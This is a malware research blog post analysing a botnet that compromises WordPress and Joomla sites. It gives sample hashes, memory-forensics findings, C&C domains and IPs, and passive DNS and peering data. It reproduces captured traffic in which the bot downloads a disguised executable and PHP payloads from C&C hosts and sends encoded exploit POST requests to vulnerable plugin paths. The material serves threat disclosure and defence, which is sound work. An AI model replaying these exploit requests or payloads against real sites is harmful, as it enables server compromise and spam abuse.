Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan  (Mutopy  - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)

The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2.  Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.


By examining the pcap, we learn that mqtgsvc.exe checks in with domain www.wholists.org 

Unpacked version of conhost.exe  7958F73DAF4B84E3B00E008258EA2E7A contains Base94 alphabet, which is being used for encoding strings and communication requests in addition to common Base64

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 - initial callback

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org' where it requests 'conh11.jpg' for download. We see that it's actually a WIN32 executable rather than a JPG file. The file has hash value of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3.  Next, our bot sends a GET request, "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php 
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OKServer: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

There were several PHP scripts observed being downloaded from 46.165.230.185.  These are part of the arsenal of scripts, one or more of which may be injected to a vulnerable server.  We link here to the PHP scripts we saw in use this malware.  The presence of any of these scripts on a CMS webserver is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits.  After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads.  By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt.  Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures.  The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- OK followed by 1234567890 MD5 encoded
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: [redacted].com
Content-Length: 439
Connection: Keep-Alive
Cache-Control: no-cache

lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ==

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache X-Powered-By: PHP/5.2.14
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

OKe807f1fcf82d132f9bb018ca6738a19f+0

2. Not Allowed = Host not vulnerable
POST /plugins/editors/jce/libraries/classes/json/defines.php
HTTP/1.1 Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 Host: www.[redacted].org
Content-Length: 506 Connection: Keep-Alive
Cache-Control: no-cache

lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1
406 Not Acceptable
Date: Mon, 27 May 2013 03:27:21 GMT
Server: Apache
Content-Length: 226
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Not Acceptable!

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.






POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php
HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.[redacted].com
Content-Length: 506
Connection: Keep-Alive
Cache-Control: no-cache
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR

HTTP/1.1 200 OK
Date: Mon, 27 May 2013 03:27:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 X-Powered-By: PHP/5.3.3-7+squeeze14 Vary: Accept-Encoding Content-Length: 354 Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive



Hosting Infrastructure 

The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure


Domain IP Address ASN Network Name
wholists.org 95.163.104.69 AS12695 Digital Networks CJSC
gettrial.store-apps.org 95.163.104.94 AS12695 Digital Networks CJSC
t22.run-stat.org 95.163.104.69 AS12695 Digital Networks CJSC
seek4.run-stat.org 46.165.230.185 AS16265 Leaseweb
bt.ads-runner.org 208.115.109.53 AS23033 Wowrack
fw.point-up.org 85.143.166.221 AS56534 PIRIX-CORPNET-2


Passive DNS

95.163.104.69 95.163.104.94 46.165.230.185 208.115.109.5385.143.166.221
www.wholists.org ns1.wholists.org ns1.upsave.info ntp.run-stat.orgfw.point-up.org
bns.wholists.org ns1.store-apps.org fw.stat-run.info bt.ads-runner.orgns2.memrem.ru
gjd.wholists.org ns1.games-olympic.org fw.run-stat.org sk4.ads-runner.orgns2.nalkanet.ru
lbh.wholists.org ns1.googleminiapi.com mail.stat-run.info ntp.stat-run.infons2.nallanite.ru
qdp.wholists.org peace.vijproject.com bt2.run-stat.org
vm.clodoserver.ru
www.techsign.org sogood.vitaminavip.com jc.upsave.info

ml.inviteyou.info img.stat-run.info ju.upsave.info


Passive DNS data courtesy of ISC SIE

Routing and Peers

The following are the BGP peering relationship graphs of the prefixes for the involved hosting providers.  

95.163.104.69 &  95.163.104.94- ASN12695 - Digital Networks CJSC (DINET)

Peering for AS12695 - January, 2013
Peering for AS12695 - May, 2013














In January, we see that for the prefix, 95.163.64.0/18, AS3216 and AS8657 were the primary upstreams for DINET, while in May, they added AS31133.

AS3216 - SOVAM-AS OJSC _Vimpelcom
AS8657 - CPRM PT Comunicacoes S A
AS31133 - MF-MGSM-AS OJSC MegaFon
CIDR Report for AS12695



208.115.109.53 - AS23033 - WowRack



Peering for AS23033 - January, 2013
Peering for AS23033 - May, 2013













For the prefix, 208.115.109.0/24, Wowrack's primary upstream is AS11404, AS-VOBIZ - vanoppen.biz LLC.
CIDR Report for AS23033



85.143.166.221 - AS56534 - PIRIX-CORPNET-2


Peering for AS56534 - January, 2013
Peering for AS56534 - May, 2013
















In January, for the prefix, 85.143.160.0/21, AS9002 and AS3267 were Pirix's primary upstreams. In May, they briefly added a relationship with AS50384.

AS9002 - ReTN.net 
AS3267 - RUNNET
AS50384 - W-IX_LTD
CIDR Report for AS56534